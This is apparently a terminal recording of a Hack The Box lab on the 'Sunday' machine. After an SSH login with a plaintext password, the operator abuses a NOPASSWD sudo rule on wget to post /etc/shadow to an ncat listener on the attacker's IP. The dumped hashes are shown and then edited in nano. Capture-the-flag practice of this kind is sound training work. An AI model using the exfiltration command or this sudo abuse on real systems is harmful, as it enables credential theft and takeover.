{"version": 2, "width": 236, "height": 100, "timestamp": 1662207592, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.019707, "o", "\u001b[?2004h\u001b]0;root@kali: ~/htb/sunday/10.10.10.76/loot/loot\u0007\u001b[;94m┌──(\u001b[1;31mroot💀kali\u001b[;94m)-[\u001b[0;1m~/htb/sunday/10.10.10.76/loot/loot\u001b[;94m]\r\r\n\u001b[;94m└─\u001b[1;31m#\u001b[0m "]
[0.55198, "o", "t"]
[0.595892, "o", "m"]
[0.758856, "o", "u"]
[0.840937, "o", "x"]
[0.931504, "o", " "]
[1.443977, "o", "n"]
[1.503131, "o", "e"]
[1.573827, "o", "w"]
[1.676401, "o", " "]
[1.840963, "o", "-"]
[1.923357, "o", "s"]
[2.078025, "o", " "]
[2.188835, "o", "s"]
[2.305292, "o", "h"]
[2.387976, "o", "a"]
[2.4756, "o", "d"]
[2.548008, "o", "o"]
[2.654279, "o", "w"]
[2.762367, "o", "\r\n\u001b[?2004l\r"]
[2.767167, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[?1006l\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?2004l\u001b[1;1H\u001b[1;100r\u001b[>c\u001b[>q\u001b[1;1H\u001b[?1006h\u001b[?1002h"]
[2.768712, "o", "\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[shadow] \u001b[4m0:bash*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                       20:19\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[?1006l\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?2004l\u001b[1;1H\u001b[1;100r"]
[2.769704, "o", "\u001b[?25l\u001b[1;1H\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[shadow] \u001b[4m0:bash*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                       20:19\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[?1006h\u001b[?1002h"]
[2.774888, "o", "\u001b[?7727h"]
[2.806106, "o", "\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[?2004h"]
[3.674767, "o", "\u001b[7msshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b(B\u001b[m"]
[3.865482, "o", "\u001b[5Gsshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\r\n\u001b[?2004l"]
[4.820343, "o", "Last login: Sat Sep  3 12:19:54 2022 from 10.10.14.31\r\n"]
[4.820627, "o", "\u001b[?25l\u001b[30m\u001b[42m\u001b[100d[shadow] \u001b[4m0:sshpass*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                    20:19\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[4;1H"]
[4.822105, "o", "Oracle Corporation      SunOS 5.11      11.4    Aug 2018\r\n"]
[4.825862, "o", "-bash-4.4$ "]
[5.336314, "o", "s"]
[5.426876, "o", "u"]
[5.573093, "o", "d"]
[5.663227, "o", "o"]
[5.802341, "o", " "]
[5.913818, "o", "-"]
[5.97338, "o", "l"]
[6.215119, "o", "\r\n"]
[6.224814, "o", "User sammy may run the following commands on sunday:\r\n    (ALL) ALL"]
[6.225034, "o", "\r\n"]
[6.225559, "o", "    (root) NOPASSWD: /usr/bin/wget"]
[6.226002, "o", "\r\n"]
[6.226939, "o", "-bash-4.4$ "]
[8.576528, "o", "\""]
[9.263263, "o", "\b \b"]
[9.964377, "o", "\u001b[?25l\u001b[30m\u001b[42m\u001b[100;1H[shadow] \u001b[4m0:sshpass*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                    20:20\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[9;12H"]
[10.254224, "o", "\u001b[?25l\u001b[50;1H───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[94m\u001b[1;1H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m sshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b[K\r\nLast login: Sat Sep  3 12:19:54 2022 from 10.10.14.31\u001b[K\r\nOracle Corporation      SunO"]
[10.254637, "o", "S 5.11      11.4    Aug 2018\u001b[K\r\n-bash-4.4$ sudo -l\u001b[K\r\nUser sammy may run the following commands on sunday:\u001b[K\r\n    (ALL) ALL\u001b[K\r\n    (root) NOPASSWD: /usr/bin/wget\u001b[K\r\n-bash-4.4$  \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2B\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[shadow] \u001b[4m0:sshpass*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                    20:20\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[51;1H"]
[10.255575, "o", "\u001b[?25l\u001b[A───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[shadow] \u001b[4m0:bash*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                       20:20\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[51"]
[10.255689, "o", ";1H"]
[10.286944, "o", "\u001b[?2004h"]
[10.287245, "o", "\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\u001b(B\u001b[m"]
[10.287341, "o", "\r\n"]
[10.287571, "o", "\u001b[94m└─\u001b[31m\u001b[1m#\u001b(B\u001b[m "]
[10.296731, "o", "\u001b[9;1H-bash-4.4$ \u001b[K\u001b[52;5H"]
[11.686605, "o", "n"]
[11.780183, "o", "c"]
[11.860454, "o", " "]
[11.955961, "o", "-"]
[12.098301, "o", "n"]
[12.194875, "o", "v"]
[12.288123, "o", "l"]
[12.33301, "o", "p"]
[12.522136, "o", " "]
[12.635426, "o", "4"]
[12.808511, "o", "4"]
[12.982288, "o", "4"]
[13.139106, "o", "4"]
[13.261328, "o", " "]
[13.468259, "o", ">"]
[13.733396, "o", " "]
[14.121629, "o", "s"]
[14.199365, "o", "h"]
[14.310442, "o", "a"]
[14.365222, "o", "d"]
[14.943496, "o", "o"]
[15.065208, "o", "w"]
[15.409525, "o", "_"]
[15.617539, "o", "o"]
[15.721494, "o", "g"]
[15.811646, "o", "\r\n\u001b[?2004l"]
[15.813884, "o", "Ncat: Version 7.92 ( https://nmap.org/ncat )\r\n"]
[15.814204, "o", "Ncat: Listening on :::4444\r\nNcat: Listening on 0.0.0.0:4444\r\n"]
[17.770268, "o", "\u001b[?25l\u001b[6A───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[shadow] \u001b[4m0:nc*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                         20:20\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5"]
[17.770332, "o", "6;1H"]
[17.948298, "o", "\u001b[?25l\u001b[6A\u001b[32m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[9;12H"]
[17.948539, "o", "\u001b[?25l\u001b[50;1H\u001b[32m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[shadow] \u001b[4m0:sshpass*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                    20:20\u001b(B\u001b[m\u001b[?12l\u001b"]
[17.948653, "o", "[?25h\u001b[9;12H"]
[22.426742, "o", "sudo /usr/bin/wget --post-file=/etc/shadow 10.10.14.31:4444"]
[22.614944, "o", "\r\n"]
[22.637209, "o", "--2022-09-03 12:20:20--  http://10.10.14.31:4444/\r\nConnecting to 10.10.14.31:4444... "]
[22.678888, "o", "\u001b[56;1HNcat: Connection from 10.10.10.76.\r\nNcat: Connection from 10.10.10.76:40207.\u001b[11;35H"]
[22.679605, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[23.822582, "o", "^C"]
[23.823219, "o", "\u001b[58;1H\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[12;43H"]
[23.82753, "o", "\r\n-bash-4.4$ "]
[25.067822, "o", "\u001b[?25l\u001b[50;1H───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[59;5H\u001b[?2004h"]
[25.068803, "o", "\u001b[?25l\u001b[50;1H───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[shadow] \u001b[4m0:bash*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                       20:20\u001b(B\u001b[m\u001b[?12l\u001b[?25h"]
[25.068848, "o", "\u001b[59;5H"]
[26.817148, "o", "c"]
[26.890419, "o", "p"]
[27.065308, "o", " "]
[27.143905, "o", "s"]
[27.259084, "o", "h"]
[27.341449, "o", "a"]
[27.42811, "o", "d"]
[27.518138, "o", "o"]
[27.636068, "o", "w"]
[28.176348, "o", "_"]
[28.39519, "o", "o"]
[28.501326, "o", "g"]
[28.621425, "o", " "]
[28.801584, "o", "s"]
[28.920403, "o", "h"]
[29.025613, "o", "a"]
[29.094013, "o", "d"]
[29.192347, "o", "o"]
[29.294293, "o", "w"]
[29.647464, "o", "\r\n\u001b[?2004l"]
[29.649448, "o", "\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[?2004h"]
[30.159313, "o", "n"]
[30.254178, "o", "a"]
[30.347137, "o", "n"]
[30.40336, "o", "o"]
[30.454008, "o", " "]
[30.617325, "o", "s"]
[30.721408, "o", "h"]
[30.818367, "o", "a"]
[30.890742, "o", "d"]
[30.978212, "o", "o"]
[31.076265, "o", "w"]
[31.268492, "o", "\r\n\u001b[?2004l"]
[31.271994, "o", "\u001b[?2004h"]
[31.272619, "o", "\u001b[?25l\u001b[11A\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[48A\u001b[?25l"]
[31.272982, "o", "\u001b[51;99r\u001b[1;1H\u001b[52;99r\u001b[48S\u001b[51;1H\u001b[K\u001b[97;112H\u001b[7m[ Reading... ]\u001b[1;100r\u001b[97;126H\u001b(B\u001b[m"]
[31.273204, "o", "\u001b[30D\u001b[7m[ Read 33 lines (Converted from DOS format) ]\u001b(B\u001b[m"]
[31.273829, "o", "\u001b[51;1H\u001b[7m  GNU nano 6.1                                                                                                       shadow                                                                                                                 \u001b[51;235H\u001b(B\u001b[m"]
[31.274115, "o", "\u001b[98;1H\u001b[7m^G\u001b(B\u001b[m Help\u001b[11C\u001b[7m^O\u001b(B\u001b[m Write Out\u001b[6C\u001b[7m^W\u001b(B\u001b[m Where Is\u001b[7C\u001b[7m^K\u001b(B\u001b[m Cut\u001b[12C\u001b[7m^T\u001b(B\u001b[m Execute\u001b[8C\u001b[7m^C\u001b(B\u001b[m Location\u001b[7C\u001b[7mM-U\u001b(B\u001b[m Undo\u001b[10C\u001b[7mM-A\u001b(B\u001b[m Set Mark\u001b[6C\u001b[7mM-]\u001b(B\u001b[m To Bracket    \u001b[7mM-Q\u001b(B\u001b[m Previous\u001b[6C"]
[31.274669, "o", "\u001b[7m^B\u001b(B\u001b[m Back\u001b[11C\u001b[7m^◂\u001b(B\u001b[m Prev Word\u001b[6C\u001b[7m^A\u001b(B\u001b[m Home\r\n\u001b[7m^X\u001b(B\u001b[m Exit\u001b[11C\u001b[7m^R\u001b(B\u001b[m Read File\u001b[6C\u001b[7m^\\\u001b(B\u001b[m Replace\u001b[8C\u001b[7m^U\u001b(B\u001b[m Paste\u001b[10C\u001b[7m^J\u001b(B\u001b[m Justify\u001b[8C\u001b[7m^/\u001b(B\u001b[m Go To Line     \u001b[7mM-E\u001b(B\u001b[m Redo\u001b[10C\u001b[7mM-6\u001b(B\u001b[m Copy\u001b[10C\u001b[7m^Q\u001b(B\u001b[m Where Was\u001b[6C\u001b[7mM-W\u001b(B\u001b[m Next\u001b[10C\u001b[7m^F\u001b(B\u001b[m Forward\u001b[8C\u001b[7m^▸\u001b(B\u001b[m Next Word\u001b[6C\u001b[7m^E\u001b(B\u001b[m End"]
[31.274807, "o", "\u001b[52;1HPOST / HTTP/1.1\r\nUser-Agent: Wget/1.19.5 (solaris2.11)\r\nAccept: */*\r\nAccept-Encoding: identity\r\nHost: 10.10.14.31:4444\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 746\u001b[61;1Hroot:$5$rounds=10000$fIoXFZ5A$k7PlwsiH0wAyVOcKaAYl/Mo1Iq6XYfJlFXs58aA4Sr3:18969::::::263424\r\ndaemon:NP:6445::::::\r\nbin:NP:6445::::::\r\nsys:NP:6445::::::\r\nadm:NP:6445::::::\r\ndladm:*LK*:17760::::::\r\nnetadm:*LK*:17760::::::\r\nnetcfg:*LK*:17760::::::\r\ndhcpserv:*LK*:17760::::::\r\nftp:*LK*:17760::::::\r\nsshd:*LK*:17760::::::\r\nsmmsp:NP:17760::::::\r\naiuser:*LK*:17760::::::\r\nikeuser:*LK*:17760::::::\r\nlp:NP:6445::::::\r\nopenldap:NP:17760::::::\r\nwebservd:*LK*:17760::::::\r\nunknown:*LK*:17760::::::\r\npkg5srv:NP:17760::::::\r\nnobody:*LK*:17760::::::\r\nnoaccess:*LK*:6445::::::\r\nnobody4:*LK*:6445::::::\r\nsammy:$5$rounds=10000$lUpW4prM$aKFJxjI7vlcj5DDvwIgYGy707a84mIEi0ZQK3XIDqT2:18980::::::\r\nsunny:$5$rounds=10000$bioFdRBN$1TTdfQFfhjNicxWhH07f8BIHABZ8di01CXWYTT5rMn9:18980::::::2661408\u001b[52;1H\u001b[?12l\u001b[?25h"]
[32.197579, "o", "\u001b[?25l\u001b[2A───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[shadow] \u001b[4m0:nano*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                       20:20\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5"]
[32.197848, "o", "2;1H"]
[32.19799, "o", "\u001b[51;125H\u001b[7m*\u001b[109C\u001b[?25l\u001b(B\u001b[m"]
[32.198088, "o", "\u001b[97;1H"]
[32.198187, "o", "\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[1;100r\u001b[96;1H"]
[32.198711, "o", "\u001b[K\u001b[44A\u001b[?12l\u001b[?25h"]
[32.364089, "o", "\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[1;100r\u001b[52;1H"]
[32.518732, "o", "\u001b[97d\u001b[?25l"]
[32.519037, "o", "\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[1;100r\u001b[52;1H\u001b[?12l\u001b[?25h"]
[32.666121, "o", "\u001b[?25l"]
[32.667092, "o", "\u001b[97d\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[1;100r\u001b[52;1H\u001b[?12l\u001b[?25h"]
[32.821848, "o", "\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[1;100r\u001b[52;1H"]
[32.974522, "o", "\u001b[?25l\u001b[97d"]
[32.974682, "o", "\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[1;100r\u001b[52;1H\u001b[?12l\u001b[?25h"]
[33.147667, "o", "\u001b[97d\u001b[?25l\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[1;100r\u001b[52;1H\u001b[?12l\u001b[?25h"]
[33.32288, "o", "\u001b[97d\u001b[?25l"]
[33.322916, "o", "\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[1;100r\u001b[52;1H\u001b[?12l\u001b[?25h"]
[33.876559, "o", "\u001b[?25l\u001b[97d"]
[33.877057, "o", "\u001b[52;97r\u001b[97;1H\n\u001b[K\u001b[1;100r\u001b[52;1H\u001b[?12l\u001b[?25h"]
[34.29944, "o", "\u001b[?25lr\u001b[?12l\u001b[?25h"]
[34.800569, "o", "o"]
[34.851262, "o", "\u001b[?25lo\u001b[?12l\u001b[?25h"]
[34.904096, "o", "t"]
[34.955355, "o", ":"]
[35.005508, "o", "$"]
[35.479318, "o", "\u001b[?25l\u001b[?12l\u001b[?25h\b"]
[35.775477, "o", "\u001b[1P"]
[35.933514, "o", "\u001b[1P"]
[36.433504, "o", "\u001b[1P"]
[36.483959, "o", "\u001b[?25l\u001b[1P\u001b[?12l\u001b[?25h"]
[36.534369, "o", "\u001b[1P"]
[36.585265, "o", "\u001b[?25l"]
[36.585514, "o", "\u001b[1P\u001b[?12l\u001b[?25h"]
[36.636041, "o", "\u001b[1P"]
[36.686269, "o", "\u001b[1P"]
[36.736684, "o", "\u001b[?25l\u001b[1P\u001b[?12l\u001b[?25h"]
[36.787591, "o", "\u001b[1P"]
[36.838421, "o", "\u001b[1P"]
[36.888868, "o", "\u001b[?25l"]
[36.888976, "o", "\u001b[?12l\u001b[?25h"]
[36.889038, "o", "\u001b[1P"]
[36.940259, "o", "\u001b[?25l"]
[36.940524, "o", "\u001b[1P\u001b[?12l\u001b[?25h"]
[36.990935, "o", "\u001b[1P"]
[37.043236, "o", "\u001b[1P"]
[37.093639, "o", "\u001b[1P"]
[37.143095, "o", "\u001b[?25l"]
[37.143309, "o", "\u001b[1P\u001b[?12l\u001b[?25h"]
[37.193989, "o", "\u001b[?25l\u001b[1P\u001b[?12l\u001b[?25h"]
[37.244426, "o", "\u001b[1P"]
[37.294737, "o", "\u001b[1P"]
[37.344637, "o", "\u001b[1P"]
[37.394732, "o", "\u001b[?25l"]
[37.394923, "o", "\u001b[?12l\u001b[?25h\u001b[1P"]
[37.444931, "o", "\u001b[1P"]
[37.496212, "o", "\u001b[1P"]
[37.547462, "o", "\u001b[1P"]
[37.598277, "o", "\u001b[1P"]
[37.648804, "o", "\u001b[1P"]
[37.700313, "o", "\u001b[1P"]
[37.750606, "o", "\u001b[?25l"]
[37.750792, "o", "\u001b[1P\u001b[?12l\u001b[?25h"]
[37.802303, "o", "\u001b[1P"]
[37.852238, "o", "\u001b[1P"]
[37.901333, "o", "\u001b[?25l"]
[37.901603, "o", "\u001b[1P\u001b[?12l\u001b[?25h"]
[37.953308, "o", "\u001b[1P"]
[38.002718, "o", "\u001b[?25l\u001b[1P"]
[38.003139, "o", "\u001b[?12l\u001b[?25h"]
[38.053272, "o", "\u001b[?25l\u001b[?12l\u001b[?25h\u001b[1P"]
[38.104021, "o", "\u001b[1P"]
[38.154542, "o", "\u001b[1P"]
[38.204562, "o", "\u001b[1P"]
[38.25537, "o", "\u001b[1P"]
[38.306018, "o", "\u001b[1P"]
[38.355735, "o", "\u001b[1P"]
[38.406013, "o", "\u001b[1P"]
[38.456033, "o", "\u001b[1P"]
[38.506571, "o", "\u001b[1P"]
[38.557284, "o", "\u001b[1P"]
[38.607891, "o", "\u001b[1P"]
[38.65745, "o", "\u001b[?25l"]
[38.657642, "o", "\u001b[1P\u001b[?12l\u001b[?25h"]
[38.707777, "o", "\u001b[?25l"]
[38.707974, "o", "\u001b[1P\u001b[?12l\u001b[?25h"]
[38.757697, "o", "\u001b[1P"]
[38.808051, "o", "\u001b[1P"]
[38.85779, "o", "\u001b[1P"]
[38.907447, "o", "\u001b[1P"]
[38.958061, "o", "\u001b[1P"]
[39.008423, "o", "\u001b[1P"]
[39.05898, "o", "\u001b[1P"]
[39.109825, "o", "\u001b[?25l\u001b[1P\u001b[?12l\u001b[?25h"]
[39.159622, "o", "\u001b[?25l"]
[39.159872, "o", "\u001b[?12l\u001b[?25h\u001b[1P"]
[39.263495, "o", "\u001b[1P"]
[39.400738, "o", "\u001b[1P"]
[39.537746, "o", "\u001b[1P"]
[39.675578, "o", "\u001b[1P"]
[39.814838, "o", "\u001b[1P"]
[39.95682, "o", "\u001b[1P"]
[40.093734, "o", "\u001b[1P"]
[40.243342, "o", "\u001b[?25l\u001b[?12l\u001b[?25h"]
[40.243546, "o", "\u001b[1P"]
[40.394378, "o", "\u001b[1P"]
[40.704193, "o", "\u001b[?25l"]
[40.704347, "o", "\u001b[?12l\u001b[?25h"]
[40.704417, "o", "\u001b[1P"]
[41.19193, "o", "\u001b[1P"]
[41.442048, "o", "\n"]
[41.942426, "o", "\n"]
[41.993027, "o", "\n"]
[42.043394, "o", "\n"]
[42.093697, "o", "\n"]
[42.143242, "o", "\n"]
[42.193732, "o", "\n"]
[42.243995, "o", "\n"]
[42.294026, "o", "\n"]
[42.345098, "o", "\n"]
[42.39557, "o", "\n"]
[42.446232, "o", "\u001b[?25l"]
[42.446298, "o", "\u001b[?12l\u001b[?25h\n"]
[42.497123, "o", "\u001b[?25l"]
[42.49741, "o", "\u001b[?12l\u001b[?25h\n"]
[42.548306, "o", "\u001b[?25l\u001b[?12l\u001b[?25h"]
[42.548553, "o", "\n"]
[42.599066, "o", "\n"]
[42.64862, "o", "\n"]
[42.699101, "o", "\n"]
[42.749931, "o", "\n"]
[42.800693, "o", "\n"]
[42.850979, "o", "\n"]
[43.074536, "o", "\n"]
[43.262673, "o", "\n"]
[43.953844, "o", ":"]
